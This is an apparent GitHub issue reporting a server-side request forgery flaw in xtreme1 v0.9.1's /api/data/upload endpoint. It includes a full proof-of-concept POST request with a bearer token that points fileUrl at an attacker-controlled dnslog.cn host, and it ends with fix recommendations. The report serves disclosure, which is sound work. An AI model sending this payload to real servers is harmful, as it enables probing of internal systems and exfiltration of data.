SSRF Vulnerability in `/api/data/upload`

Describe the bug

A Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/data/upload path. The vulnerability is triggered through the fileUrl parameter, which allows an attacker to make arbitrary requests to internal or external systems.

To Reproduce Send a POST request to /api/data/upload with the fileUrl parameter set to a URL under the attacker's control. Example request:

`POST /api/data/upload HTTP/1.1 Host: localhost:8190 Content-Length: 88 sec-ch-ua: sec-ch-ua-mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJCYXNpY0FJIiwiaWF1IjoxNzI2NjU4NTA4LCJleHAiOjE3MjcwOTA2MTcsInN1YiI6IjIifQ.NesghMUWkzzJMiLRDC_g0Tom1m_zVpgD4yS50edvODAHETgxQCT1MQXs4O1YXhmWIaz6LHY7BZo-K94GXnlotg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 Content-Type: application/json;charset=UTF-8 Accept: application/json, text/plain, / ignoreCancelToken: true sec-ch-ua-platform: "" Origin: http://localhost:8190 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8190/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

{"fileUrl":"http://fykbyi.dnslog.cn","datasetId":"5","source":"URL","dataFormat":"COCO"}`

After sending the request, a DNS request is received on dnslog.cn, confirming that the server made a request to the attacker's controlled domain. This demonstrates that an attacker can craft a malicious HTTP request to trick the application into making requests to arbitrary systems and exfiltrating information to an attacker's external domain.

Affected Version This Vuln Affect latest Version: v0.9.1

Fixes Recommendations Input Validation: Implement strict validation on the fileUrl parameter to ensure only allowed domains are processed. Whitelist Approach: Use a whitelist of allowed URLs or domains that the application can access.

xtreme1-io / xtreme1

SSRF Vulnerability in `/api/data/upload` #284